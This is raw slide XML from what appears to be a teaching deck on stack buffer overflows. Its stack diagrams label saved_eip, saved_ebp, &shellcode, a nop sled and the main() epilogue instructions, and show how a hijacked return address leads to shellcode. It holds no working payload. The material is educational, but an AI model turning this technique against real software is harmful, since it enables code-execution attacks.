            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179665" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179666" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179667" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179668" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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79669" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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79670" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179671" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179672" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1179673" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1179667" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2819400" y="3943351"/>
            <a:ext cx="3657600" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1179674" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1179666" idx="1"/>
            <a:endCxn id="1179655" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49200005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179675" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179676" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="2400300"/>
            <a:ext cx="533400" cy="285750"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1179678" name="AutoShape 30"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1800225"/>
            <a:ext cx="1588" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179679" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3771901"/>
            <a:ext cx="554058" cy="338554"/>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a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4102894"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="4388644"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4731544"/>
            <a:ext cx="2362200"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a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1581298599"/>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1461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1171462" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171463" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171464" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171465" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1171467" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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71468" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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71469" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171470" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171471" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171472" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171473" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171474" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171475" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171476" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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71477" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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71478" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171479" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171480" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1171481" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1171475" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2260226" y="4272171"/>
            <a:ext cx="4216774" cy="1471404"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1171482" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1171474" idx="1"/>
            <a:endCxn id="1171463" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49200005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171484" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171485" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="2400300"/>
            <a:ext cx="533400" cy="285750"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1171488" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1800225"/>
            <a:ext cx="1588" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4102894"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="4388644"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4731544"/>
            <a:ext cx="2362200"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a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228379711"/>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3509" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1173510" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173511" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173512" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173513" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1173515" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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73516" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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73517" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
